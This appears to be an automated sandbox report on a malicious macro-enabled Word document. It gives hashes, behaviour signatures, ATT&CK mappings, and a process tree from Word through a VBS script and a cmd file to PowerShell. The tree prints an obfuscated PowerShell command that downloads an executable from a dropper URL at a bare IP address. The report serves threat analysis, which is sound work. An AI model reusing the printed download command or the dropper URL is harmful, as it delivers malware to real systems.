Overview

overview

10

Static

static

8

TTP-US-246841413.docm

windows7_x64

10

TTP-US-246841413.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    129s
  • max time network
    173s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 12:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TTP-US-246841413.docm

  • Size

    93KB

  • MD5

    674d7910c1ee176de0e24fd0179d83ab

  • SHA1

    ff11c4281f065fa38d91e606a5e294d7fd8e312d

  • SHA256

    567b7fe91330078fd3ba9e0f152203bb4e8edf5af0d43dd09deb7273cff24b39

  • SHA512

    3825964d5a19453885e521c8e79cfc086b253bbbef34467abf94bc7044cb3c89409bcdae1313ba01ab109a60961abaa960a41e3d963f45531d377186994a94b6

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://62.108.35.26/generator.php

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\TTP-US-246841413.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\explorer.exe
      explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
      2⤵
      • Process spawned unexpected child process
      PID:3632
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1800
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1604
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2652
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.26/generator.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1760
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          4⤵
          • Delays execution with timeout.exe
          PID:3112

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd
    Filesize

    21KB

    MD5

    408f33dd378d96e4ccd439f05370c3e9

    SHA1

    1da9b505753f4c3c9b7d175e181f383317455256

    SHA256

    193f23ad0bd0e9076fd0370f89bed6f48d7f72fa34b40679fcde1c5d2bc88227

    SHA512

    f1b3db9cef3e949067a56af8626d7422900d153277a9824ab64a471411092fcc2b44e79326e4e4446938875e769da170ef5b37618f820b0b96b9d522d4140337

    Download Submit
  • C:\ProgramData\OIUTFuy
    Filesize

    4KB

    MD5

    f68f78d0cdd0be34785eba37ae4787d3

    SHA1

    fdc6a82309b966af80d03db8557a98f50ed57bcf

    SHA256

    e2eb68d537314b4fceb6aeee6737102387e85cb0d5c06e4e8a3881dabbfef2d4

    SHA512

    2de718f4e079674db9bc1b0f67a43f28941623f0d8c1246120feefe372e7d9b2608fe78e223eff8c6d75731763fd66d29ecec1ee158c7430cefc6723e84d9cbd

    Download Submit
  • C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
    Filesize

    89KB

    MD5

    cbda7ec492b04a9a0258ad89779fd397

    SHA1

    3e8e0c1a59019994beaa1f5362034c3e3580a0ef

    SHA256

    21d108ef69fe0403a46c053c72e9a5b93a11d42cb2f1c098c6be762cfdda5f7e

    SHA512

    00f10131f1065c0b4b7df6f9ca2b20b2835c2e478d1116d7bc29a6d16bf8f6191055ab7da0572de32aadd111bf69958d6ffea1046c723c47cf53ab8127807d7e

    Download Submit
  • memory/1604-140-0x0000000000000000-mapping.dmp
    Download
  • memory/1760-146-0x00007FF8E5710000-0x00007FF8E61D1000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/1760-145-0x00000254F3530000-0x00000254F3552000-memory.dmp
    Filesize

    136KB

    Download
  • memory/1760-144-0x0000000000000000-mapping.dmp
    Download
  • memory/2324-134-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2324-137-0x000001C3EC190000-0x000001C3EC194000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2324-136-0x00007FF8CDFC0000-0x00007FF8CDFD0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2324-135-0x00007FF8CDFC0000-0x00007FF8CDFD0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2324-130-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2324-133-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2324-132-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2324-131-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2652-142-0x0000000000000000-mapping.dmp
    Download
  • memory/3112-147-0x0000000000000000-mapping.dmp
    Download
  • memory/3632-138-0x0000000000000000-mapping.dmp
    Download